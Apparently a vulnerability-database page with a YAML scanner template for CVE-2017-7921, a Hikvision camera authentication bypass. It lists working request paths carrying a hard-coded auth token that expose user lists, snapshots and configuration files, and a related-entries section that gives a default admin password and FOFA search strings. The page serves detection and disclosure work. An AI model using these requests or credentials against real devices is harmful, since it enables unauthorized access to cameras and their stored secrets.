CVE-2017-7921: Hikvision CVE-2017-7921

漏洞描述

PoC代码[已公开]

id: CVE-2017-7921

info:
  name: Hikvision CVE-2017-7921
  author: whwlsfb(https://github.com/whwlsfb)
  severity: critical
  verified: true
  description: |
    /Security/users?auth=YWRtaW46MTEK  
    /onvif-http/snapshot?auth=YWRtaW46MTEK
    /System/configurationFile?auth=YWRtaW46MTEK
  reference:
    - https://www.cnblogs.com/charon1937/p/13819804.html
    - https://nvd.nist.gov/vuln/detail/CVE-2017-7921
  tags: hikvision,cve,cve2017,disclosure
  created: 2024/01/06

rules:
  r0:
    request:
      method: GET
      path: /system/deviceInfo?auth=YWRtaW46MTEK
    expression: response.status == 200 && response.headers["content-type"] == "application/xml" && response.body.bcontains(b"<firmwareVersion>")
expression: r0()

相关漏洞推荐

• CVE-2021-36260: Hikvision IP camera/NVR - Unauthenticated RCE POC

  2025-09-01 | Hikvision IP camera NVR
  A command injection vulnerability in the web server of some Hikvision product. Due to the insufficie...

• hikvision-intercom-service-default-password: Hikvision Intercom Service Default Password POC

  2025-09-01 | Hikvision Intercom Service
  app="HIKVISION-群组对讲服务配置平台" admin/12345

• hikvision-af-env-info-disclosure: HiKVISION 综合安防管理平台 env 信息泄漏漏洞 POC

  2025-09-01 | hikvision
  HIKVISION 综合安防管理平台存在信息泄漏漏洞，攻击者通过漏洞可以获取环境env等敏感消息进一步攻击 FOFA: app="HIKVISION-综合安防管理平台"

• CVE-2017-1000028: GlassFish LFI POC

  2025-09-01 | GlassFish
  GlassFish是一款强健的商业兼容应用服务器，达到产品级质量，可免费用于开发、部署和重新分发。开发者可以免费获得源代码，还可以对代码进行更改。GlassFish漏洞成因:java语义中会把&quo...

• CVE-2017-1000486: Primetek Primefaces 5.x - Remote Code Execution POC

  2025-09-01 | Primetek Primefaces
  Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution.